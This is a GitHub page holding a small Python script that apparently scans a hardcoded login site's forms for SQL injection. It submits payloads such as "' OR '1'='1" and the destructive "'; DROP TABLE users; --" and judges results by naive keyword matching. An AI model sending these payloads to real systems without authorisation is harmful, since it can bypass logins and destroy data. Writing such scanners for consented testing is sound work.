vulnerability-scanner-python/scanner.py at main · cutiips/vulnerability-scanner-python · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
import requests
import time
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.firefox.service import Service
from selenium.webdriver.firefox.options import Options

def fetch_full_html(url):
    service = Service("C:\\Python312\\geckodriver.exe")
    options = Options()
    options.binary_location = "C:\\Program Files\\Mozilla Firefox\\firefox.exe"

    driver = webdriver.Firefox(service=service, options=options)
    driver.get(url)

    time.sleep(3)

    html = driver.page_source
    driver.quit()

    return html


def test_request():
    print("=== Test requête ===")
    try:
        response = requests.get(url)
        response.raise_for_status()  # example : raise 404
        soup = BeautifulSoup(response.text, 'html.parser')
        title = soup.title.string
        print(f"Le titre de la page {url} est : '{title}'")
    except requests.exceptions.RequestException as e:
        print("Erreur lors de la requête :", e)

def test_sql_injection(url):
    sql_payloads = ["' OR '1'='1", "' OR 'a'='a", "' OR 1=1--", "'; DROP TABLE users; --"]

    try:
        html = fetch_full_html(url)
        soup = BeautifulSoup(html, 'html.parser')

        forms = soup.find_all("form")
        print(f"Formulaires trouvés sur {url}: {len(forms)}")

        for form in forms:
            form_action = form.attrs.get("action", "")
            form_method = form.attrs.get("method", "get").lower()

            for payload in sql_payloads:
                form_data = {}
                for input_tag in form.find_all("input"):
                    input_name = input_tag.attrs.get("name")
                    input_type = input_tag.attrs.get("type", "text")

                    if input_name and input_type == "text":
                        form_data[input_name] = payload

                form_url = url if form_action is None else url + form_action
                if form_method == "post":
                    response = requests.post(form_url, data=form_data)
                else:
                    response = requests.get(form_url, params=form_data)

                if "error" in response.text.lower() or "sql" in response.text.lower():
                    print(f"Vulnérabilité potentielle d'injection SQL détectée avec le payload '{payload}' dans {form_url}")
                else:
                    print(f"Aucune vulnérabilité détectée avec le payload '{payload}' dans {form_url}")

    except requests.exceptions.RequestException as e:
        print("Erreur lors de la requête :", e)

if __name__ == "__main__":
    # entrer une URL d'une source (avoir l'accord)
    url = 'https://13-air-ajtd.rxq.ch/#/login'
    test_request()
    test_sql_injection(url)